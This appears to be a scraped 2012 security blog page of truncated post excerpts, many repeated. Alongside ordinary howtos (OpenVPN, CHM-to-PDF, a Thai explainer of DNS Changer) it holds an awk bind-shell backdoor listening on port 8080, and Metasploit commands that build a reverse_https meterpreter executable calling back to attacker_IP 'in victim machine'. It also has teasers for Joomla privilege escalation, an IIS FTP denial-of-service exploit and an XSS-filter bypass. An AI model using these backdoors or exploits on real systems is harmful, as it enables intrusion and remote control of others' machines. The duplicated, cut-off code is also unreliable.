Please download this app. from Source.
MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.
Source: http://packetstormsecurity.org/files/114693
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Showing posts with label howto. Show all posts
Showing posts with label howto. Show all posts
Friday, 13 July 2012
Thursday, 12 July 2012
A Backdoor in gawk by thegrugg
BEGIN {
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
Wednesday, 11 July 2012
Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges
This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.
Let us focus on our own and
Wordpress all Version full Path Disclosure Vulnerability By KinG Of PiraTeS
================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
##
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
##
Tuesday, 10 July 2012
Howto: Use openvpn config files on Mac OS X
This post will tell you how to use openvpn and openvpn config file on Mac OSX
1. Download the Tunnelblick from http://code.google.com/p/tunnelblick/
2. Open the downloaded disk image file (which mounts the disk image).
3. Double click on Tunnelblick icon to install program, after that take the step of Tunnelblick installer
4. After Install completed, copy your openvpn config files to ~/Library
1. Download the Tunnelblick from http://code.google.com/p/tunnelblick/
2. Open the downloaded disk image file (which mounts the disk image).
3. Double click on Tunnelblick icon to install program, after that take the step of Tunnelblick installer
4. After Install completed, copy your openvpn config files to ~/Library
Monday, 9 July 2012
DNS Changer ทำงานยังไงกันแน่
เป็นประเด็นค่อนข้างมากกับเรื่อง Malware ที่ชือว่า DNS Changer วันนี้ขอหยิบยกมาพูดหน่อยละกันครับ
ก่อนที่จะรู้ว่า DNS Changer ทำงานยังไง เรามาดูก่อนดีกว่าว่า DNS คืออะไรครับ
DNS คืออะไร
โดยปกติแล้วการเข้าไปใช้งานเว็บไซด์ต่างๆ จะไม่ได้ติดต่อกันด้วยชื่อของเว็บไซด์อย่าง www.facebook.com, www.google.com หรอกนะ เพราะการเชื่อมต่อเน็ตเวิร์คต่างๆทำด้วย IP Address ส่วนชื่อเว็บไซด์(domain name)
ก่อนที่จะรู้ว่า DNS Changer ทำงานยังไง เรามาดูก่อนดีกว่าว่า DNS คืออะไรครับ
DNS คืออะไร
โดยปกติแล้วการเข้าไปใช้งานเว็บไซด์ต่างๆ จะไม่ได้ติดต่อกันด้วยชื่อของเว็บไซด์อย่าง www.facebook.com, www.google.com หรอกนะ เพราะการเชื่อมต่อเน็ตเวิร์คต่างๆทำด้วย IP Address ส่วนชื่อเว็บไซด์(domain name)
Tuesday, 3 July 2012
How to convert CHM files into PDF files in Ubuntu
In the Ubuntu, chm2pdf is a Python script that converts CHM files into PDF files.
1. Install chm2pdf in ubuntu and another required application$sudo aptitude install chm2pdf python-chm pdftk htmldoc
2. Use the command chm2pdf
$ chm2pdf --book file.chm
3. you will receive file.pdf.
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
1. Install chm2pdf in ubuntu and another required application$sudo aptitude install chm2pdf python-chm pdftk htmldoc
2. Use the command chm2pdf
$ chm2pdf --book file.chm
3. you will receive file.pdf.
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Monday, 2 July 2012
Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service
If you want to see the exploit code, please go to the Source.
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
Using beef plugin with Metasploit
1. Run the beef service
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
Create Auto reconnect Backdoor With Metasploit
This post will show how to install the autoconnect backdoor in victim machine.
1. Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe
2. Binding receiving backdoor
1. Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe
2. Binding receiving backdoor
Monday, 25 June 2012
finddomains - discovering domain names/web sites/virtual hosts
FindDomains is a multithreaded search engine discovery tool that will be very useful for penetration testers dealing with discovering domain names/web sites/virtual hosts which are located on too many IP addresses. Provides a console interface so you can easily integrate this tool to your pentest automation system.It retrieves domain names/web sites which are located on specified ip address/
Thursday, 21 June 2012
Browsers Anti-XSS methods in ASP (classic) have been defeated!
If you want to see full article,please go to the Source.
Browsers Anti-XSS methods in ASP (classic) have been defeated!This time, I want to start with the summary section first to break the rules!SummaryThe intention of this paper is to prove the client-side XSS protection methods must have rules for different web application languages, otherwise they will be bypassed. This research is based on
Browsers Anti-XSS methods in ASP (classic) have been defeated!This time, I want to start with the summary section first to break the rules!SummaryThe intention of this paper is to prove the client-side XSS protection methods must have rules for different web application languages, otherwise they will be bypassed. This research is based on